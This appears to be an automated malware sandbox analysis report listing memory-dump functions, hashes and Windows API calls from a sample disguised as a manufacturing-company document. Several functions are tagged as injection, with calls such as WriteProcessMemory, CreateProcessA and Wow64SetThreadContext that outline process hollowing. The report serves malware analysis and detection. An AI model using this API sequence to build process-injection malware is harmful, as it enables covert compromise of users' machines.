Function 010A28AA Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e1d8abdcdef3ffe3280b23fc147037ebb394bd77e3d440719de95990031a88
Instruction ID: 034c8a2cae2ee2499fa68ac0a0a71dc3274c77a784eff7fe68298372ce68e78a
Opcode Fuzzy Hash: 64e1d8abdcdef3ffe3280b23fc147037ebb394bd77e3d440719de95990031a88
Instruction Fuzzy Hash: 11E0C231D2032B9ACB249BB4D8084FEFF34FED2310B608267D4103A000EB30265AC7A0

Function 010A28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bab43ffa149fe91ae90cddce7980e88b1514653df4450b177c70e4e211466d5
Instruction ID: 5173bff55ec8661dcf84086ce029f384702e65dc4f64c9eecc6a0c168bdb71ed
Opcode Fuzzy Hash: 1bab43ffa149fe91ae90cddce7980e88b1514653df4450b177c70e4e211466d5
Instruction Fuzzy Hash: 76D01231D2032A978B10A6A5DC044EEBB38EE95221B504626D51437144EB70665986A1

Function 010AD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df21cc55b6400f258d138ddca6ff5ee9fd5d574ca978cd709cade312e8362649
Instruction ID: cb6290d9dd2f920f5e45d697778e2067dda93e81af9c81d8b813ae1a4a09c653
Opcode Fuzzy Hash: df21cc55b6400f258d138ddca6ff5ee9fd5d574ca978cd709cade312e8362649
Instruction Fuzzy Hash: 18D0E235E0010CCFCB30DFA8E4844DCFB70EB4D321B10942AE825A3202D63428518F11

Function 010AAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3c5a6f58b2792f201b60715fa4070a5a4028a2a6dfb537289a273c4fe5d370
Instruction ID: 4bacffa6be7092e3a673fdac12a80c171f34e3b8f118e66266129a9789d96647
Opcode Fuzzy Hash: 2d3c5a6f58b2792f201b60715fa4070a5a4028a2a6dfb537289a273c4fe5d370
Instruction Fuzzy Hash: C7D0677AB000089FCB149F98E8409DDF776FB98221B048117E915A3264C6319925DB50

Function 010A6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04fbad1d1901ca5cd506767386fc5e1501e48e1018730250d79641dd14988f9
Instruction ID: 1bf96ea41140b6613a2e63f53c9f44f18006e44a4662754b862af2f6a5832731
Opcode Fuzzy Hash: c04fbad1d1901ca5cd506767386fc5e1501e48e1018730250d79641dd14988f9
Instruction Fuzzy Hash: 9BC080710103194FD501F771FC56655336E76C1500780D520D0C60975DEEF9A8894FB5

Non-executed Functions

Function 06920040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4efd096b9044481574fb23e013059d043c3a4281d60cdafa7a2233488ab655
Instruction ID: c1bad985e1c52261f3b42c93e058f613ebeb3ee8d8c957bb66147c5602f01646
Opcode Fuzzy Hash: dd4efd096b9044481574fb23e013059d043c3a4281d60cdafa7a2233488ab655
Instruction Fuzzy Hash: AC528A74E01229CFDB64DF65C884B9EBBB2BB89300F5081EAD449A7358DB359E85CF50

Function 010AF961 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78dad0cc97b6f492485f22d5ddf1492a02a3d4de395d8e7ea2c647806fff8731
Instruction ID: d2c1c99e5de7cd8a2d63f0fe82baf2a16a997d149349c9c585a748d46cf0a24c
Opcode Fuzzy Hash: 78dad0cc97b6f492485f22d5ddf1492a02a3d4de395d8e7ea2c647806fff8731
Instruction Fuzzy Hash: 58C1D074E01219CFDB54DFA5C894B9DBBB2BF89300F6081A9D849AB358DB359E81CF50

Function 0692E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7316a399d2618e42ec936b2fad4e8337740159ddb087233d036c3ea3d23e37e6
Instruction ID: dfae6248c071baf9c11c9bffc6cf20c10ced77aeecfbbf54cb44b8d1538a1757
Opcode Fuzzy Hash: 7316a399d2618e42ec936b2fad4e8337740159ddb087233d036c3ea3d23e37e6
Instruction Fuzzy Hash: 0BC1C174E01229CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E81CF50

Function 0692E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5dada86dc22c9e87966f65f1ec3a0c9de3a8b7ab5150a5790037f32054b3237
Instruction ID: 5dc948464d1f41fc777575758444ec24f2cabd984c93756ed01399d38b74c013
Opcode Fuzzy Hash: c5dada86dc22c9e87966f65f1ec3a0c9de3a8b7ab5150a5790037f32054b3237
Instruction Fuzzy Hash: C3C1D074E01228CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E85CF50

Function 0692F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d389f6a48ec0817655a674ced64a8c3ddc990ba031d643230ce2473fbdde52ef
Instruction ID: 954c467d79eba1be10ea964145a27116e63e6645b2f15b1fa38052f50d6e296d
Opcode Fuzzy Hash: d389f6a48ec0817655a674ced64a8c3ddc990ba031d643230ce2473fbdde52ef
Instruction Fuzzy Hash: 78C1D074E01228CFDB54DFA5C994B9DBBB2BF89300F6080A9D409AB358DB359E81CF10

Function 0692EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52436751e1ed603a7d05ba2eab79923f58e491b94c90ce35039fd9a78e501c81
Instruction ID: a5493046ea7af9cd2f2f702d5c59bc779251be7c7ede19169da7385ce348c3ca
Opcode Fuzzy Hash: 52436751e1ed603a7d05ba2eab79923f58e491b94c90ce35039fd9a78e501c81
Instruction Fuzzy Hash: 89C1C274E01229CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E81CF50

Function 0692EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c115fccb9f158e24c2b8b440b07edd0ab251fc3aee2939e25da37878432a4d
Instruction ID: 6d5d1c254144538d12d5ee3c5970f606f2ebfb5e9e4ea9944a026bf1389d8a5e
Opcode Fuzzy Hash: 49c115fccb9f158e24c2b8b440b07edd0ab251fc3aee2939e25da37878432a4d
Instruction Fuzzy Hash: F9C1DF74E01228CFDB54DFA5C894B9DBBB2BF89300F2080A9D409AB358DB349E85CF50

Function 0692CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef70f363d70d01f13487faeb8032c71155cc65dec7eac72fd2c757a91280f4d5
Instruction ID: f68d91110f141ca5014d8a8f92c6f5c01f74e809237156feb12fa60ae29f6095
Opcode Fuzzy Hash: ef70f363d70d01f13487faeb8032c71155cc65dec7eac72fd2c757a91280f4d5
Instruction Fuzzy Hash: 7FC1C174E01218CFDB94DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E85CF50

Function 0692D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 812bfa0bde2a00ab757975f374a0ce3863686253e7d36492180aee878b3b91a0
Instruction ID: f4596723d18fdfae7775f77841778c06a2f5b6d8f00a44ef31e3f7f582dd6790
Opcode Fuzzy Hash: 812bfa0bde2a00ab757975f374a0ce3863686253e7d36492180aee878b3b91a0
Instruction Fuzzy Hash: A6C1C174E01228CFDB54DFA5C994B9DBBB2BF89300F6081A9D409AB358DB359E85CF50

Function 0692F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb7b82e13d0497667cb9c86662c349d4d2ca2ca0c37c3a87408b1c9e5d3a9ed
Instruction ID: 693fc2521da0aed30b9c056c30fef717552297d03bd43dae447397f50375a354
Opcode Fuzzy Hash: adb7b82e13d0497667cb9c86662c349d4d2ca2ca0c37c3a87408b1c9e5d3a9ed
Instruction Fuzzy Hash: 75C1C274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB358DB359E85CF50

Function 0692D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42791232c25ab75983692c46c01726eef9b9fb51e3dd509f7a74521c3a0e194f
Instruction ID: 372d655e066ad2f157ec15ef88bd36817f1c5c86eba02859192922632d142d01
Opcode Fuzzy Hash: 42791232c25ab75983692c46c01726eef9b9fb51e3dd509f7a74521c3a0e194f
Instruction Fuzzy Hash: 88C1D274E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB758DB359E85CF50

Function 0692D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dbeede7fdd368a0cf9a6c7d8878d2fc0676eb1494b748c0eea307a790ce1e3c
Instruction ID: 6ceaa1d85405270a28e4539bf2f6cc20f933fe969de7b19aca1f84607902771c
Opcode Fuzzy Hash: 6dbeede7fdd368a0cf9a6c7d8878d2fc0676eb1494b748c0eea307a790ce1e3c
Instruction Fuzzy Hash: 6AC1C178E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB358DB359E85CF50

Function 06920673 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb343b49578bd36df58a61922e58bf90ec8bc0723981451f93580c1f0b8fe87
Instruction ID: 0b181bd48344d0b951dd24085d6d4e1bd2fe36c1e4784e81a4aa484cb1aa7560
Opcode Fuzzy Hash: 7fb343b49578bd36df58a61922e58bf90ec8bc0723981451f93580c1f0b8fe87
Instruction Fuzzy Hash: 78A19D74A01228CFDB64DF64C894B9ABBB2BF89300F5085EAD449A7354DB319E81CF51

Function 010AF2C0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94861d35516a8909aad7c60a892016629491ff7c2785e273b6515a04d4557e64
Instruction ID: 366678204a2dea7c6a3c92106ac7ea70109e6e469f380801426f03be37ae1178
Opcode Fuzzy Hash: 94861d35516a8909aad7c60a892016629491ff7c2785e273b6515a04d4557e64
Instruction Fuzzy Hash: 31512571D0120ACBEB04EFE8D5447EEBBB2BB89300F94C169D494BB298DB759885CF54

Function 010AF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 690005c4b32244a4ebc8e23a69de419e318be78061cc2223b3d236b3c8901645
Instruction ID: 215d045119bcb0250a26689da066d02e83a4924d8f144c7fc624cfb28fca0a14
Opcode Fuzzy Hash: 690005c4b32244a4ebc8e23a69de419e318be78061cc2223b3d236b3c8901645
Instruction Fuzzy Hash: 9951F275D0120ACFDB14EFE8D484BEDBBB2FB49300FA48169D595AB294CB369881CF54

Function 06920853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3748012067.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6920000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc242e38f8c55e505f0d222dfcd76dec57a2b89887ffc8a3f761236631a644f
Instruction ID: 292978178840baa847ea5e388e63f1c43736a5d3cf1140fae89e8a0277e4d1f6
Opcode Fuzzy Hash: 8bc242e38f8c55e505f0d222dfcd76dec57a2b89887ffc8a3f761236631a644f
Instruction Fuzzy Hash: 2D51A174A01229CFDB64DF64D854BAABBB2FF4A301F5085E9D40AA7354DB319E81CF50

Function 010A6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 010A692C
\;q, xrefs: 010A695E
\;q, xrefs: 010A6936
\;q, xrefs: 010A6952

Memory Dump Source

Source File: 0000000B.00000002.3735532060.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10a0000_Autofill Manufacturing Sdn Bhd 28-08-2024.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: c4fe4cfb9c8242e00397ce4f47d176e268c57c86f36679786c5f7dcf722a6ab6
Instruction ID: 5a59e7214eefdba3acc2c51ceda1a5db477a7eb4923c9fa574e088e63a98315a
Opcode Fuzzy Hash: c4fe4cfb9c8242e00397ce4f47d176e268c57c86f36679786c5f7dcf722a6ab6
Instruction Fuzzy Hash: 8601F2327005048FC7608EACC454AA937FEBF8876276D41AAE586CB371DE32DC418B40

Analysis Process: GhrKoSGuCdvpJ.exePID: 7032, Parent PID: 1040COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	183
Total number of Limit Nodes:	12

Executed Functions

Function 0306D7B0 Relevance: 6.1, APIs: 4, Instructions: 138
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0306D83E
GetCurrentThread.KERNEL32 ref: 0306D87B
GetCurrentProcess.KERNEL32 ref: 0306D8B8
GetCurrentThreadId.KERNEL32 ref: 0306D911

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a58340db7703c5d7ea74b3caadfc588be3f3555fa37d7af61f41944fb8e9e446
Instruction ID: 611cdec26b7382573bd3cca5d94aed2604e6c0656db648dd330626afad2b1ab8
Opcode Fuzzy Hash: a58340db7703c5d7ea74b3caadfc588be3f3555fa37d7af61f41944fb8e9e446
Instruction Fuzzy Hash: BA5189B0E013498FEB14CFA9D948BEEBBF1EF48304F248469E019AB3A4D7755944CB65

Function 0306D7C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0306D83E
GetCurrentThread.KERNEL32 ref: 0306D87B
GetCurrentProcess.KERNEL32 ref: 0306D8B8
GetCurrentThreadId.KERNEL32 ref: 0306D911

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 88caeb03c34de402578e0f4a363422b79c4cf0f8e49e6e619c7bb7271b195338
Instruction ID: 3f154ebdd1a26f0b934d8f1e3ea54ba6dd18f4c99ccc5e7c182095da5e2250c6
Opcode Fuzzy Hash: 88caeb03c34de402578e0f4a363422b79c4cf0f8e49e6e619c7bb7271b195338
Instruction Fuzzy Hash: 7C5158B0D013498FEB14CFAAD548BDEBBF1EF48304F24C469E419A72A0D7755944CB65

Function 0764AFCC Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764B20E

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 428097636209a8fce6233bfb4b93644d16a48d1091aec3c4b08830993006502a
Instruction ID: 5f6cc61a62f69ae2ad241c53ee0c4ced7ef33eba495b124fadbe00e29049a490
Opcode Fuzzy Hash: 428097636209a8fce6233bfb4b93644d16a48d1091aec3c4b08830993006502a
Instruction Fuzzy Hash: A9A15CB1D00759DFEB24CFA9C841BEEBBB2BF48310F148569D819A7280DB749985CF91

Function 0764AFD8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764B20E

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 36872ac7e3ec884a6c17bf5fc8fce94556f558c2c041af67e12a01c33e68f55f
Instruction ID: 09b3922019b084d23c00b5a5dbcbba944ed3700d20ae74f431c0c99f4a356942
Opcode Fuzzy Hash: 36872ac7e3ec884a6c17bf5fc8fce94556f558c2c041af67e12a01c33e68f55f
Instruction Fuzzy Hash: EF916CB1D00759CFEB24CF69C840BEEBBB2BF48310F148569D819A7280DB749985CF91

Function 0306B519 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0306B77E

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e211437a8e82d500de6eafcf8a3fadaa90ac1273a9d38be949be3e813eaac429
Instruction ID: 23ce951370f277514290bf5921eda7f544ee818eda4c8d4b4903028641e6d63d
Opcode Fuzzy Hash: e211437a8e82d500de6eafcf8a3fadaa90ac1273a9d38be949be3e813eaac429
Instruction Fuzzy Hash: 1A8166B0A01B058FDB64DF2AD45079ABBF5FF88300F048A6DE08ACBA54D774E945CB91

Function 03065E54 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 03065F11

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 40f013c2b7bc350ffbf0571aa6e4186e10a582211acf4e1a7210927dbf5a14a3
Instruction ID: 8e4a9dacdca106a62ec3ec47fc277659f1d4df14a5f2afbe939f01a11ecd0302
Opcode Fuzzy Hash: 40f013c2b7bc350ffbf0571aa6e4186e10a582211acf4e1a7210927dbf5a14a3
Instruction Fuzzy Hash: 0941C0B0D01719CBDB24DFA9C844B8EBBF5BF49304F24806AD418AB255D7B16946CF50

Function 03064A60 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 03065F11

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9de099235f84ad03b32a0c932c81413e2ccf9c413b09f36f5fc9062a2e46dc79
Instruction ID: eacfdefe602188fb7964402895542e593f76e3520900d44cad1f82e86cea1bd4
Opcode Fuzzy Hash: 9de099235f84ad03b32a0c932c81413e2ccf9c413b09f36f5fc9062a2e46dc79
Instruction Fuzzy Hash: E641CFB0C0171DCBDB28DFA9C844B9DBBF5BF49304F20806AD408AB255D7B16986CF90

Function 0764AA39 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764AAC0

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9fb944b953adc6ac1d147c7aada36a8c3ccbcdaffc54d9292ac622b075db5dc3
Instruction ID: afb942d4037845933191cedddd009cc9f6c815a279ec923dfeb0de31d57b263d
Opcode Fuzzy Hash: 9fb944b953adc6ac1d147c7aada36a8c3ccbcdaffc54d9292ac622b075db5dc3
Instruction Fuzzy Hash: E8216BB2D00349AFDB10DFAAC8417EEBBF1FF48310F10842AD959A7640C7749981CBA0

Function 0764A949 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764A9E0

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d4c97f1c88ea264fa878cb6289f25867786775d891cb6cd768215c697713aff4
Instruction ID: 55f83919c19d7bd9280abb1de9a0416b57792b5f8caf9a56c379bf332076eec0
Opcode Fuzzy Hash: d4c97f1c88ea264fa878cb6289f25867786775d891cb6cd768215c697713aff4
Instruction Fuzzy Hash: 122137B6D103599FDB10CFAAC8817EEBBF5FF48310F10842AE959A7241C7789940CBA0

Function 0764A950 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764A9E0

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a4a4f8573b0ab930b922a676f61ecefa4ef2ad53924fe3fc8637465cd9064d7a
Instruction ID: 8d5606f7421763001d0e882e1f2d03b684c424a5398bfea4ebff2ec1764262e2
Opcode Fuzzy Hash: a4a4f8573b0ab930b922a676f61ecefa4ef2ad53924fe3fc8637465cd9064d7a
Instruction Fuzzy Hash: 052127B1D003599FDB14DFAAC881BDEBBF5FF48310F10842AE959A7240C7789944CBA0

Function 0764A379 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764A3FE

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b6d7b84d9826b1c79315398a46430e876e998792416a0404d40f50fc5913dd4e
Instruction ID: 611b417c8e6a6174c55381d433cf119a909e145118c0601c897b346ad70ea2b6
Opcode Fuzzy Hash: b6d7b84d9826b1c79315398a46430e876e998792416a0404d40f50fc5913dd4e
Instruction Fuzzy Hash: 64216AB1D003099FDB10DFAAC4847EEBBF4EF48214F14C429D859A7241CB78A985CFA0

